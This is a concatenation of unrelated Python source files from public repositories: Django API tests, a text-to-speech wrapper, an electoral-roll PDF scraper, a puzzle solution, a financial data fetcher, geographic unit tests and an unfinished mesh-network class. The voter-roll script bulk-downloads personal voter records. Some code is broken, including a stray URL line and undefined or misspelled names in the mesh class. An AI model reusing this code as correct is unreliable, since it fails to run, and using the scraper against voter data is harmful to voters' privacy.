expected_content_ids = (sibling.content_id,)
response = self.client.get(
reverse("kolibri:core:contentnode-next-steps", kwargs={"pk": user.id})
)
response_content_ids = set(node["content_id"] for node in response.json())
self.assertSetEqual(set(expected_content_ids), response_content_ids)
def tearDown(self):
"""
clean up files/folders created during the test
"""
cache.clear()
super(ContentNodeAPITestCase, self).tearDown()
def mock_patch_decorator(func):
def wrapper(*args, **kwargs):
mock_object = mock.Mock()
mock_object.json.return_value = [{"id": 1, "name": "studio"}]
with mock.patch.object(requests, "get", return_value=mock_object):
return func(*args, **kwargs)
return wrapper
class KolibriStudioAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
DeviceSettings.objects.create(is_provisioned=True)
cls.facility = Facility.objects.create(name="facility")
superuser = FacilityUser.objects.create(
username="superuser", facility=cls.facility
)
superuser.set_password(DUMMY_PASSWORD)
superuser.save()
cls.superuser = superuser
DevicePermissions.objects.create(user=superuser, is_superuser=True)
def setUp(self):
self.client.login(username=self.superuser.username, password=DUMMY_PASSWORD)
@mock_patch_decorator
def test_channel_list(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-list"), format="json"
)
self.assertEqual(response.data[0]["id"], 1)
@mock_patch_decorator
def test_channel_retrieve_list(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-retrieve-list", kwargs={"pk": 1}),
format="json",
)
self.assertEqual(response.data[0]["id"], 1)
@mock_patch_decorator
def test_no_permission_non_superuser_channel_list(self):
user = FacilityUser.objects.create(username="user", facility=self.facility)
user.set_password(DUMMY_PASSWORD)
user.save()
self.client.logout()
self.client.login(username=user.username, password=DUMMY_PASSWORD)
response = self.client.get(
reverse("kolibri:core:remotechannel-list"), format="json"
)
self.assertEqual(response.status_code, 403)
@mock_patch_decorator
def test_channel_retrieve(self):
response = self.client.get(
reverse("kolibri:core:remotechannel-detail", kwargs={"pk": "abc"}),
format="json",
)
self.assertEqual(response.data["name"], "studio")
@mock_patch_decorator
def test_channel_info_404(self):
mock_object = mock.Mock()
mock_object.status_code = 404
requests.get.return_value = mock_object
response = self.client.get(
reverse("kolibri:core:remotechannel-detail", kwargs={"pk": "abc"}),
format="json",
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def tearDown(self):
cache.clear()
| indirectlylit/kolibri | kolibri/core/content/test/test_content_app.py | Python | mit | 72,718 |
import os
import re
import subprocess
from utils import whereis_exe
class osx_voice():
def __init__(self, voice_line):
mess = voice_line.split(' ')
cleaned = [ part for part in mess if len(part)>0 ]
self.name = cleaned[0]
self.locality = cleaned[1]
self.desc = cleaned[2].replace('# ', '')
def __str__(self):
return self.name + ' ' + self.locality + ' ' + self.desc
def fetch_voices():
osx_voices = []
if whereis_exe("say"):
voices_raw = os.popen("say -v ?").read()
voice_lines = voices_raw.split('\n')
for line in voice_lines:
try:
osx_voices.append(osx_voice(line))
except IndexError:
pass
return osx_voices
def speak(text, voice, rate):
if whereis_exe("say"):
subprocess.call(["say", text, "-v", voice, "-r", rate])
| brousch/saythis2 | tts_engines/osx_say.py | Python | mit | 888 |
import urllib2
import os
baseurl = "http://ceoaperms.ap.gov.in/TS_Rolls/PDFGeneration.aspx?urlPath=D:\SSR2016_Final\Telangana\AC_001\English\S29A"
constituencyCount = 0
constituencyTotal = 229
while constituencyCount <= constituencyTotal:
pdfCount = 1
notDone = True
constituencyCount = constituencyCount + 1
while notDone:
http://ceoaperms.ap.gov.in/TS_Rolls/PDFGeneration.aspx?urlPath=D:\SSR2016_Final\Telangana\AC_001\English\S29A001P001.PDF
url = baseurl+str(constituencyCount).zfill(2)+'P'+str(pdfCount).zfill(3)+".pdf"
pdfCount = pdfCount + 1
try:
u = urllib2.urlopen(url)
response_headers = u.info()
if response_headers.type == 'application/pdf':
directory = "Path to dir" + str(constituencyCount).zfill(3) + "/"
try:
os.makedirs(directory)
except OSError:
pass # already exists
file_name = directory + url.split('/')[-1]
u = urllib2.urlopen(url)
f = open(file_name, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print "Downloading: %s Bytes: %s" % (file_name, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
status = status + chr(8)*(len(status)+1)
print status,
f.close()
else:
notDone = False
except urllib2.URLError, e:
if e.code == 404:
notDone = False
| abhishek-malani/python-basic-coding | python-basic-coding/python-basic-coding/voter_data_download.py | Python | mit | 1,936 |
#!/usr/bin/env python3
# Advent of Code 2016 - Day 7, Part One
import sys
import re
from itertools import islice
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
def has_abba(string):
for s in window(string, 4):
if s[:2] == s[:1:-1] and s[0] != s[1]:
return True
return False
def main(argv):
if len(argv) < 2:
print("Usage: day07-pt1.py puzzle.txt")
return 1
valid = 0
with open(argv[1]) as f:
for line in f:
nets = re.split('[\[\]]', line.strip())
if any(has_abba(s) for s in nets[::2]) \
and not any(has_abba(h) for h in nets[1::2]):
valid += 1
print(valid)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| mcbor/adventofcode | 2016/day07/day07-pt1.py | Python | mit | 1,067 |
from pydatastream import Datastream
import json
import datetime
import sys
import os.path
#hardcoded directories
dir_input = "input/"
dir_output = "output/"
#check that the login credentials and input file location are being passed in
numOfArgs = len(sys.argv) - 1
if numOfArgs != 3:
print "Please run this python script with username,password and input file location in that order respectively."
exit()
#Setup login credentials and input file location
username = str(sys.argv[1])
pw = str(sys.argv[2])
input_file_loc = dir_input + str(sys.argv[3])
#Ensure that the input file location exists
if ( not os.path.isfile(str(input_file_loc)) ):
print "The file " + str(input_file_loc) + " does not exist."
exit()
#login credentials to datastream
DWE = Datastream(username=username,password=pw)
#other info from datastream
info = DWE.system_info()
subscribed_sources = DWE.sources()
#replace missing data with NaNs
DWE.raise_on_error = False
#get all codes, groups, start dates from input file
with open(input_file_loc,'r') as input_file:
symbol_ref = json.load(input_file)
#download timestamp
download_date = {'Custom_Download_Date' : datetime.datetime.now().isoformat()}
#calculate time taken for entire process
time_taken = datetime.datetime.now()
time_taken = time_taken - time_taken
for desc,desc_value in symbol_ref.iteritems():
for group,group_value in desc_value.iteritems():
#create list for custom fields
custom_fields = list()
for code_key,code_value in group_value.iteritems():
for key,value in code_value.iteritems():
if(key == 'code'):
search_code = value
search_symbol = {'Custom_Ticker' : value}
if(key == 'start_date'):
start_date = value
if(key == 'custom_field'):
custom_fields[:] = []
custom_fields.append(value)
startTime = datetime.datetime.now()
#send request to retrieve the data from Datastream
req = DWE.fetch(str(search_code),custom_fields,date_from=str(start_date),only_data=False)
time_taken = time_taken + datetime.datetime.now() - startTime
#format date and convert to json
raw_json = req[0].to_json(date_format='iso')
raw_metadata = req[1].to_json()
#Data cleaning and processing
#remove the time component including the '.' char from the key values of datetime in the data
raw_json = raw_json.replace("T00:00:00.000Z","")
#replace the metadata's keys from "0" to "default_ws_key"
raw_metadata = raw_metadata.replace("\"0\"","\"Custom_WS_Key\"")
#combine the data and the metadata about the code
allData_str = json.loads(raw_json)
metadata_str = json.loads(raw_metadata)
datastream_combined = {key : value for (key,value) in (allData_str.items() + metadata_str.items())}
#create symbol json string and append to data
data_with_symbol = {key : value for (key,value) in (search_symbol.items() + datastream_combined.items())}
#append group
group_code = {'Custom_Group' : group}
data_with_group = {key : value for (key,value) in (group_code.items() + data_with_symbol.items())}
#append category
category = {'Custom_Description' : desc}
data_with_category = {key : value for (key,value) in (category.items() + data_with_group.items())}
#append download timestamp
final_data = {key : value for (key,value) in (download_date.items() + data_with_category.items())}
final_data_json = json.dumps(final_data)
#decode to the right format for saving to disk
json_file = json.JSONDecoder().decode((final_data_json))
#save to json file on server
if(len(group_value) > 1):
filename = dir_output + desc + '_' + group + '_' + code_key + '.json'
else:
filename = dir_output + desc + '_' + group + '.json'
with open(filename,'w') as outfile:
json.dump(json_file,outfile,sort_keys=True)
print "time taken for " + str(sys.argv[3]) + " to be retrieved: " + str(time_taken)
| jinser/automate_pydatastream | getcustom.py | Python | mit | 3,917 |
"""Unit tests for conus_boundary.py."""
import unittest
import numpy
from gewittergefahr.gg_utils import conus_boundary
QUERY_LATITUDES_DEG = numpy.array([
33.7, 42.6, 39.7, 34.9, 40.2, 33.6, 36.4, 35.1, 30.8, 47.4, 44.2, 45.1,
49.6, 38.9, 35.0, 38.1, 40.7, 47.1, 30.2, 39.2
])
QUERY_LONGITUDES_DEG = numpy.array([
276.3, 282.7, 286.6, 287.5, 271.0, 266.4, 258.3, 257.3, 286.8, 235.0, 273.5,
262.5, 277.2, 255.3, 271.8, 254.3, 262.1, 247.8, 262.9, 251.6
])
IN_CONUS_FLAGS = numpy.array(
[1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1], dtype=bool
)
class ConusBoundaryTests(unittest.TestCase):
"""Each method is a unit test for conus_boundary.py."""
def test_find_points_in_conus_no_shortcuts(self):
"""Ensures correct output from find_points_in_conus.
In this case, does not use shortcuts.
"""
conus_latitudes_deg, conus_longitudes_deg = (
conus_boundary.read_from_netcdf()
)
these_flags = conus_boundary.find_points_in_conus(
conus_latitudes_deg=conus_latitudes_deg,
conus_longitudes_deg=conus_longitudes_deg,
query_latitudes_deg=QUERY_LATITUDES_DEG,
query_longitudes_deg=QUERY_LONGITUDES_DEG, use_shortcuts=False)
self.assertTrue(numpy.array_equal(these_flags, IN_CONUS_FLAGS))
def test_find_points_in_conus_with_shortcuts(self):
"""Ensures correct output from find_points_in_conus.
In this case, uses shortcuts.
"""
conus_latitudes_deg, conus_longitudes_deg = (
conus_boundary.read_from_netcdf()
)
these_flags = conus_boundary.find_points_in_conus(
conus_latitudes_deg=conus_latitudes_deg,
conus_longitudes_deg=conus_longitudes_deg,
query_latitudes_deg=QUERY_LATITUDES_DEG,
query_longitudes_deg=QUERY_LONGITUDES_DEG, use_shortcuts=True)
self.assertTrue(numpy.array_equal(these_flags, IN_CONUS_FLAGS))
if __name__ == '__main__':
unittest.main()
| thunderhoser/GewitterGefahr | gewittergefahr/gg_utils/conus_boundary_test.py | Python | mit | 2,046 |
#!/usr/bin/python3.3
import somnTCP
import somnUDP
import somnPkt
import somnRouteTable
from somnLib import *
import struct
import queue
import threading
import socket
import time
import random
PING_TIMEOUT = 5
class somnData():
def __init__(self, ID, data):
self.nodeID = ID
self.data = data
class somnMesh(threading.Thread):
TCPTxQ = queue.Queue()
TCPRxQ = queue.Queue()
UDPRxQ = queue.Queue()
UDPAlive = threading.Event()
networkAlive = threading.Event()
routeTable = somnRouteTable.somnRoutingTable()
cacheId = [0,0,0,0]
cacheRoute = [0,0,0,0]
cacheNextIndex = 0
_mainLoopRunning = 0
enrolled = False
nodeID = 0
nodeIP = "127.0.0.1"
nodePort = 0
lastEnrollReq = 0
connCache = [('',0),('',0),('',0)]
_printCallbackFunction = None
def __init__(self, TxDataQ, RxDataQ, printCallback = None):
threading.Thread.__init__(self)
self.CommTxQ = TxDataQ
self.CommRxQ = RxDataQ
random.seed()
self.nodeID = random.getrandbits(16)
self.nextConnCacheIndex = 0
self._printCallbackFunction = printCallback
TCPTxQ = queue.Queue()
TCPRxQ = queue.Queue()
UDPRxQ = queue.Queue()
self.pendingRouteID = 0
self.pendingRoute = 0
self.pendingRouteHTL = 1
self.routeLock = threading.Lock()
self.routeBlock = threading.Event()
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingCache = [0,0,0,0,0]
self.pingLock = threading.Lock()
def printinfo(self, outputStr):
if self._printCallbackFunction == None:
print("{0:04X}: {1}".format(self.nodeID, outputStr))
else:
self._printCallbackFunction(self.nodeID, outputStr)
def enroll(self):
#self.printinfo("enrolling")
tcpRespTimeout = False
ACK = random.getrandbits(16)
enrollPkt = somnPkt.SomnPacket()
enrollPkt.InitEmpty("NodeEnrollment")
enrollPkt.PacketFields['ReqNodeID'] = self.nodeID
enrollPkt.PacketFields['ReqNodeIP'] = IP2Int(self.nodeIP)
enrollPkt.PacketFields['ReqNodePort'] = self.nodePort
enrollPkt.PacketFields['AckSeq'] = ACK
udp = somnUDP.somnUDPThread(enrollPkt, self.UDPRxQ, self.networkAlive, self.UDPAlive)
udp.start()
while not tcpRespTimeout and self.routeTable.getNodeCount() < 3:
try:
enrollResponse = self.TCPRxQ.get(timeout = 1)
except queue.Empty:
tcpRespTimeout = True
break
respNodeID = enrollResponse.PacketFields['RespNodeID']
respNodeIP = enrollResponse.PacketFields['RespNodeIP']
respNodePort = enrollResponse.PacketFields['RespNodePort']
#self.printinfo("Got enrollment response from {0:04X}".format(respNodeID))
self.routeTable.getNodeIndexFromId(respNodeID)
if self.routeTable.getNodeIndexFromId(respNodeID) > 0:
self.TCPRxQ.task_done()
continue
elif enrollResponse.PacketType == somnPkt.SomnPacketType.NodeEnrollment and enrollResponse.PacketFields['AckSeq'] == ACK:
if self.routeTable.addNode(respNodeID, Int2IP(respNodeIP), respNodePort) < 0:
self.printinfo("Something went wrong in adding the node")
#TODO: Can we make this an exception?
packedEnrollResponse = somnPkt.SomnPacketTxWrapper(enrollResponse, Int2IP(respNodeIP),respNodePort)
self.TCPTxQ.put(packedEnrollResponse)
self.enrolled = True
self.printinfo("Enrolled to: {0:04X}".format(respNodeID))
self.TCPRxQ.task_done()
#break
return udp
def run(self):
socket.setdefaulttimeout(5)
self.networkAlive.set()
Rx = somnTCP.startSomnRx(self.nodeIP, self.nodePort, self.networkAlive, self.TCPRxQ)
Tx = somnTCP.startSomnTx(self.networkAlive, self.TCPTxQ)
while True:
if Rx.bound and Tx.bound: break
self.nodePort = Rx.port
#self.printinfo("Port: {0}".format(self.nodePort))
enrollAttempts = 0
while not self.enrolled:
self.UDPAlive.set()
UDP = self.enroll()
if self.enrolled:
break
elif enrollAttempts < 2:
self.UDPAlive.clear()
UDP.join()
enrollAttempts = enrollAttempts + 1
else:
self.enrolled = True
self.printinfo("Enrolled as Alpha Node")
break
#start main loop to handle incoming queueus
self._mainLoopRunning = 1
rxThread = threading.Thread(target = self._handleTcpRx)
rxThread.start()
self.pingTimer.start()
while self._mainLoopRunning:
self._handleUdpRx()
self._handleTx()
# Do a bunch of stuff
try:
self.pingTimer.cancel()
except:
pass
self.networkAlive.clear()
UDP.networkAlive = False
UDP.join()
Rx.join()
Tx.join()
self.TCPRxQ.join()
self.TCPTxQ.join()
self.CommTxQ.join()
self.CommRxQ.join()
def _pingRouteTable(self):
# check if previous route requests were returned
self.pingLock.acquire()
for idx, node in enumerate(self.pingCache):
if node != 0:
# remove nodes where no response was returned
self.printinfo("Dropping Node: {0:04X}".format(node))
self.routeTable.removeNodeByIndex(self.routeTable.getNodeIndexFromId(node))
# unset returned route cache
self.pingCache[idx] = 0
self.pingLock.release()
# send a RouteReqeust for node 0xFFFF to each entry in the routing table
for node in self.routeTable.getConnectedNodes():
nodeIndex = self.routeTable.getNodeIndexFromId(node)
self.pingLock.acquire()
self.pingCache[nodeIndex - 1] = node
self.pingLock.release()
pingPkt = somnPkt.SomnPacket()
pingPkt.InitEmpty(somnPkt.SomnPacketType.RouteRequest)
pingPkt.PacketFields['SourceID'] = self.nodeID
pingPkt.PacketFields['LastNodeID'] = self.nodeID
pingPkt.PacketFields['DestID'] = 0xFFFF
pingPkt.PacketFields['HTL'] = 1
TxInfo = self.routeTable.getNodeInfoByIndex(nodeIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(pingPkt, TxInfo.nodeAddress, TxInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingTimer.start()
def _handleTx(self):
#print("Handle TX")
try:
TxData = self.CommTxQ.get(False)
except:
return
#TODO: Tx Data coming from the Comm Layer needs to packetized
route = 0
#check cache for route to dest ID
if TxData.nodeID in self.cacheId:
route = self.cacheRoute[self.cacheId.index(TxData.nodeID)]
else:
route = self._getRoute(TxData.nodeID)
#TODO Lock around this
self.pendingRouteID = 0
self.pendingRouteHTL = 1
if route == 0: # no valid rout found
self.printinfo(" *** NO ROUTE FOUND *** ")
return
# inset path into cache, for now this is a FIFO eviction policy, should upgrade to an LFU policy
self.cacheId[self.cacheNextIndex] = TxData.nodeID
self.cacheRoute[self.cacheNextIndex] = route
self.cacheNextIndex = self.cacheNextIndex + 1
if self.cacheNextIndex > 3:
self.cacheNextIndex = 0
#pop first step in route from route string
nextRoute, newRoute = self._popRoute(route)
#nextRouteStep = newRoute[0]
#set route string in packet
TxPkt = somnPkt.SomnPacket()
TxPkt.InitEmpty(somnPkt.SomnPacketType.Message)
TxPkt.PacketFields['SourceID'] = self.nodeID
TxPkt.PacketFields['DestID'] = TxData.nodeID
TxPkt.PacketFields['Message'] = TxData.data
TxPkt.PacketFields['Route'] = newRoute
#create wrapper packet to send to next step in route
TxNodeInfo = self.routeTable.getNodeInfoByIndex(nextRoute)
if TxNodeInfo is None:
self.cacheRoute[self.cacheId.index(TxData.nodeID)] = 0
self.CommTxQ.task_done()
self.CommTxQ.put(TxData)
return
txPktWrapper = somnPkt.SomnPacketTxWrapper(TxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
#send packet to TX layer
self.TCPTxQ.put(txPktWrapper)
self.CommTxQ.task_done()
def _handleTcpRx(self):
while self._mainLoopRunning:
try:
RxPkt = self.TCPRxQ.get(False)
except:
continue
pktType = RxPkt.PacketType
#self.printinfo("Rx'd TCP packet of type: {0}".format(pktType))
if pktType == somnPkt.SomnPacketType.NodeEnrollment:
#print("Enrollment Packet Received")
self.pingTimer.cancel()
# There is a potential for stale enroll responses from enrollment phase, drop stale enroll responses
if RxPkt.PacketFields['ReqNodeID'] == self.nodeID: continue
# We need to disable a timer, enroll the node, if timer has expired, do nothing
for idx, pendingEnroll in enumerate(self.connCache):
if (RxPkt.PacketFields['ReqNodeID'], RxPkt.PacketFields['AckSeq']) == pendingEnroll[0]:
# disable timer
pendingEnroll[1].cancel()
# clear connCache entry
self.connCache[idx] = (('',0),)
# add node
self.routeTable.addNode(RxPkt.PacketFields['ReqNodeID'], Int2IP(RxPkt.PacketFields['ReqNodeIP']), RxPkt.PacketFields['ReqNodePort'])
#self.printinfo("Enrolled Node:{0:04X} ".format(RxPkt.PacketFields['ReqNodeID']))
break
self.pingTimer = threading.Timer(random.randrange(45,90), self._pingRouteTable)
self.pingTimer.start()
elif pktType == somnPkt.SomnPacketType.Message:
#print("({0:X}) Message Packet Received".format(self.nodeID))
# Check if we are the dest node
if RxPkt.PacketFields['DestID'] == self.nodeID:
self.printinfo("{0:04X} -> {1:04X}: {2}".format(RxPkt.PacketFields['SourceID'], self.nodeID, RxPkt.PacketFields['Message']))
# strip headers before pushing onto queue
commData = somnData(RxPkt.PacketFields['SourceID'], RxPkt.PacketFields['Message'])
self.CommRxQ.put(commData)
# otherwise, propagate the message along the route
elif not RxPkt.PacketFields['Route']:
# generate bad_route event
print("nothing to see here, move along folks")
else:
nextHop, RxPkt.PacketFields['Route'] = self._popRoute(RxPkt.PacketFields['Route'])
TxNodeInfo = self.routeTable.getNodeInfoByIndex(nextHop)
if TxNodeInfo is None:
# this should generate a bad route pacekt
self.printinfo("Invalid Route Event")
self.TCPRxQ.task_done()
continue
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
elif pktType == somnPkt.SomnPacketType.RouteRequest:
#print("Route Req Packet Received")
if RxPkt.PacketFields['SourceID'] == self.nodeID:
# this our route request, deal with it.
if self.pendingRouteID == RxPkt.PacketFields['DestID']:
self.routeLock.acquire()
#self.printinfo("Servicing Returned Route for {0:04X}".format(self.pendingRouteID))
if RxPkt.PacketFields['Route'] != 0:
self.pendingRoute = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
self.routeBlock.set()
self.routeLock.release()
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['HTL'] < 10:
self.routeLock.release()
self.pendingRouteHTL = self.pendingRouteHTL + 1
RxPkt.PacketFields['HTL'] = self.pendingRouteHTL
RxPkt.PacketFields['ReturnRoute'] = 0
TxNodeInfo = self.routeTable.getNodeInfoByIndex(self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['DestID'] == 0xFFFF:
self.pingLock.acquire()
for idx, node in enumerate(self.pingCache):
if node == RxPkt.PacketFields['LastNodeID']:
self.pingCache[idx] = 0
self.pingLock.release()
self.TCPRxQ.task_done()
continue
else: # this route has been served
#self.routeLock.release()
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
# if route field is -0-, then it is an in-progress route request
# otherwise it is a returning route request
elif not RxPkt.PacketFields['Route']:
# check if we have the destid in our routeTable
idx = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['DestID'])
if idx < 0: # Continue route request
if RxPkt.PacketFields['HTL'] > 1:
#print("got multi Hop route request")
RxPkt.PacketFields['ReturnRoute'] = self._pushRoute(RxPkt.PacketFields['ReturnRoute'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['HTL'] = RxPkt.PacketFields['HTL'] - 1
lastID = RxPkt.PacketFields['LastNodeID']
RxPkt.PacketFields['LastNodeID'] = self.nodeID
#transmit to all nodes, except the transmitting node
i = 1
while i <= self.routeTable.getNodeCount():
TxNodeInfo = self.routeTable.getNodeInfoByIndex(i)
i = i + 1
if not TxNodeInfo.nodeID == lastID:
#continue
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif RxPkt.PacketFields['HTL'] == 1: # Last Node in query path
RxPkt.PacketFields['HTL'] = RxPkt.PacketFields['HTL'] - 1
TxNodeInfo = self.routeTable.getNodeInfoByIndex(self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else:
#if RxPkt.PacketFields['ReturnRoute'] == 0:
# TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['SourceID'])
#else:
TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else: # Dest Node is contained in route table
RxPkt.PacketFields['HTL'] = 0
RxPkt.PacketFields['Route'] = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['DestID']))
#if RxPkt.PacketFields['ReturnRoute'] == 0: # Route did not go past HTL = 1
# TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['SourceID'])
#else:
# TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
TxIndex = self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID'])
RxPkt.PacketFields['LastNodeID'] = self.nodeID
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
#print("Dest Node Found: ",RxPkt.PacketFields)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
else: # route path is non-empty
RxPkt.PacketFields['Route'] = self._pushRoute(RxPkt.PacketFields['Route'], self.routeTable.getNodeIndexFromId(RxPkt.PacketFields['LastNodeID']))
RxPkt.PacketFields['LastNodeID'] = self.nodeID
#print("Route Non Empty: ",RxPkt.PacketFields)
TxIndex, RxPkt.PacketFields['ReturnRoute'] = self._popRoute(RxPkt.PacketFields['ReturnRoute'])
TxNodeInfo = self.routeTable.getNodeInfoByIndex(TxIndex)
TxPkt = somnPkt.SomnPacketTxWrapper(RxPkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
self.TCPRxQ.task_done()
continue
elif pktType == somnPkt.SomnPacketType.BadRoute:
print("Bad Route Packet Received")
self.TCPRxQ.task_done()
continue
elif pktType == somnPkt.SomnPacketType.AddConnection:
for pendingConn in self.connCache:
if (RxPkt.PacketFields['RespNodeID'], RxPkt.PacketFields['AckSeq']) == pendingConn[1]: # This is response
# cancel timer
pendingConn[2].cancel()
# add node
routeTable.addNode(RxPkt.PacketFields['RespNodeID'], Int2IP(RxPkt.PacketFields['RespNodeIP']), RxPkt.PacketFields['RespNodePort'])
# send AddConnection ACK packet
packedTxPkt = somnPkt.SomnPacketTxWrapper(somnPkt.SomnPacket(RxPkt.ToBytes()),Int2IP(RxPkt.PacketFields['RespNodeIP']), RxPkt.PacketFields['RespNodePort'])
self.TCPTxQ.put(packedTxPkt)
continue
# This is an incoming request
# generate a TCP Tx packet, start a timer, store ReqNodeID and timer object
TxPkt = somnPkt.SomnPacket(RxPkt.ToBytes())
TxPkt.Packetfields['RespNodeID'] = self.nodeID
TxPkt.Packetfields['RespNodeIP'] = self.nodeIP
TxPkt.Packetfields['RespNodePort'] = self.nodePort
connCacheTag = (TxPkt.PacketFilds['ReqNodeID'], TxtPkt.PacketFields['AckSeq'])
TxTimer = threading.Timer(5.0, self._connTimeout, connCacheTag)
self.connCache[self.nextconnCacheEntry] = (connCacheTag, TxTimer)
self.nextConnCacheEntry = self.nextConnCacheEntry + 1
if self.nextConnCacheEntry >= len(self.connCache):
self.nextConnCacheEntry = 0
print("Add Conn Packet Received")
elif pktType == somnPkt.SomnPacketType.DropConnection:
print("Drop Conn Packet Received")
else:
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
#RxPkt.Reset()
self.TCPRxQ.task_done()
continue
def _handleUdpRx(self):
#print("handleUDP")
try:
enrollPkt = self.UDPRxQ.get(False)
except:
return
enrollRequest = somnPkt.SomnPacket(enrollPkt)
self.UDPRxQ.task_done()
#ignore incoming enrollment requests from self
if enrollRequest.PacketFields['ReqNodeID'] == self.nodeID:
return
#self.printinfo("Got enrollment request from {0:04X}".format(enrollRequest.PacketFields['ReqNodeID']))
if self.routeTable.getNodeIndexFromId(enrollRequest.PacketFields['ReqNodeID']) > 0:
#self.printinfo("Node already connected, ignoring")
#self.UDPRxQ.task_done()
return
if self.routeTable.getAvailRouteCount() > 4 or (self.lastEnrollReq == enrollRequest.PacketFields['ReqNodeID'] and self.routeTable.getAvailRouteCount() > 0):
enrollRequest.PacketFields['RespNodeID'] = self.nodeID
enrollRequest.PacketFields['RespNodeIP'] = IP2Int(self.nodeIP)
enrollRequest.PacketFields['RespNodePort'] = self.nodePort
packedEnrollResponse = somnPkt.SomnPacketTxWrapper(enrollRequest, Int2IP(enrollRequest.PacketFields['ReqNodeIP']), enrollRequest.PacketFields['ReqNodePort'])
connCacheTag = (enrollRequest.PacketFields['ReqNodeID'], enrollRequest.PacketFields['AckSeq'])
TxTimer = threading.Timer(10.0, self._enrollTimeout, connCacheTag)
self.connCache[self.nextConnCacheIndex] = (connCacheTag, TxTimer)
self.nextConnCacheIndex = self.nextConnCacheIndex + 1
if self.nextConnCacheIndex >= len(self.connCache): self.nextConnCacheIndex = 0
#print("------- START UDP LISTEN -----------")
#print(self.routeTable.getAvailRouteCount())
#print("Responded to Enroll Request")
#print("---------- END UDP LISTEN-----------")
self.TCPTxQ.put(packedEnrollResponse)
TxTimer.start()
else:
self.lastEnrollReq = enrollRequest.PacketFields['ReqNodeID']
#self.UDPRxQ.task_done()
return
#get route from this node to dest node
def _getRoute(self, destId):
#first, check if the dest is a neighboring node
routeIndex = self.routeTable.getNodeIndexFromId(destId)
if routeIndex != -1:
return routeIndex & 0x7
#unknown route (discover from mesh)
routePkt = somnPkt.SomnPacket()
routePkt.InitEmpty(somnPkt.SomnPacketType.RouteRequest)
routePkt.PacketFields['SourceID'] = self.nodeID
routePkt.PacketFields['LastNodeID'] = self.nodeID
routePkt.PacketFields['RouteRequestCode'] = 1 #random.getrandbits(16)
routePkt.PacketFields['DestID'] = destId
routePkt.PacketFields['HTL'] = 1
self.pendingRouteID = destId
self.pendingRoute = 0
t = threading.Timer(10, self._routeTimeout)
idx = 1
while idx <= self.routeTable.getNodeCount():
TxNodeInfo = self.routeTable.getNodeInfoByIndex(idx)
#print("getRoute Packet Type: ", routePkt.PacketFields)
TxPkt = somnPkt.SomnPacketTxWrapper(routePkt, TxNodeInfo.nodeAddress, TxNodeInfo.nodePort)
self.TCPTxQ.put(TxPkt)
idx = idx + 1
t.start()
#self.printinfo("Waiting for route")
self.routeBlock.wait()
self.routeBlock.clear()
#self.printinfo("Waiting Done")
try:
t.cancel()
except:
pass
return self.pendingRoute
def _routeTimeout(self):
